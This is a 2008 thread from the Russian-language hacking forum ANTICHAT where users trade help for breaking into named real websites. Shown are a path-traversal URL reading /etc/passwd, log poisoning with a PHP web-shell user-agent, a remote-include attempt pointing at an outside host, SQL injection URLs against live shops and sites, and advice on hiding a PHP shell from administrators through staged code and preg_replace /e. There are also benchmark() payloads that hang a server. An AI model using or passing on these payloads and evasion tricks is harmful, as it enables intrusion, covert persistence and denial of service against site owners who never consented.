ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

15.01.2008, 22:20
|
|
Познающий
Регистрация: 02.06.2007
Сообщений: 39
Провел на форуме: 553176
Репутация:
15
|
|
Народ как использовать данные уязвимости -
http://www.planeta.ua/fc/template.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
Если можно то по подробней пожалуйста !
Спасибо !
|
|
|

15.01.2008, 23:32
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
там кодес типа
PHP код:
...
include($_GET['filename']);
...
посему те надо наследить в логах (например с юзер-агентом <? system($_GET[cmd]);?> ) и потом их проинклудить
удалённый инклуд не катит ибо так настроен сервер
http://www.planeta.ua/fc/template.php?filename=http://toxa.nov.ru/z.txt
__________________
|
|
|

16.01.2008, 00:56
|
|
Познающий
Регистрация: 02.06.2007
Сообщений: 39
Провел на форуме: 553176
Репутация:
15
|
|
посему те надо наследить в логах (например с юзер-агентом <? system($_GET[cmd]);?> ) и потом их проинклудить
можно по подробней пожалуйста ! или где об этом можно почитать ?
|
|
|

16.01.2008, 13:38
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
неправда, селект работает
http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'%20or%201=(select%20 1)--
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|

17.01.2008, 01:17
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме: 36633
Репутация:
3
|
|
Здравствуйте!
Подскажите, как можно закодировать .php файл с шеллом, чтобы сервер его исполнял, а админ не смог бы найти по названию функций и прочему тексту этот файл через поиск файлов в каталоге.
желательно, чтобы по словам
Код:
eval(gzinflate(base64_decode('
он тоже не нашел этот файл.
Linux, Apache2
софт типа Zend Optimiser не стоит.
Спасибо! 
Последний раз редактировалось fervex; 17.01.2008 в 01:19..
|
|
|

17.01.2008, 02:36
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
собираешь код
в переменную в несколько этапов, разбросанных под коду и пропускаешь через preg_replace с модификатором e
__________________
|
|
|

17.01.2008, 03:03
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме: 905389
Репутация:
332
|
|
пчочему то ругается на union просто на select и тому подобное...
http://shop.winm.ru/index.php?productID=262'
этот магазин не работает уже 2 года а сайт остался... я на нем тренируюсь он дырявый xss я нашел много теперь нашел ошибку в sql но немогу ее использовать...
Причем как то странно LIMIT работает: ( http://shop.winm.ru/index.php?productID=353+or+15+limit+3 ) а вот остально нет...
и еще один вопросик phpbb можно взломать не зарегистрировавшись??? а то тоже для жксперементов нашел не администрируемый и мертвый форум последнее обновление в 2005 г и там регистрация только с подтверждения админа... можно его както взломать?
могу адрес дать....
Последний раз редактировалось KIR@PRO; 17.01.2008 в 03:05..
|
|
|

17.01.2008, 03:13
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
мускуль 3 ветки
__________________
|
|
|

17.01.2008, 03:17
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме: 905389
Репутация:
332
|
|
я тебя немного не понял можешь обьяснить..... я понял то что нет инъекции но на будующее что значит в 3 ветки?
|
|
|

17.01.2008, 03:29
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме: 5636868
Репутация:
849
|
|
в 3-ей ветке нет оператора union
можешь benchmark использовать...
http://localhost/test.php?id=1-benchmark(1000000,benchamrk(1000000, md5(current_time))), или
http://localhost/test2.php?order=(benchmark(1000000,benchamrk(10000 00, md5(current_time))))
Тупо вешает сервак (работает на 3-ке)
Последний раз редактировалось Basurman; 27.01.2008 в 00:39..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|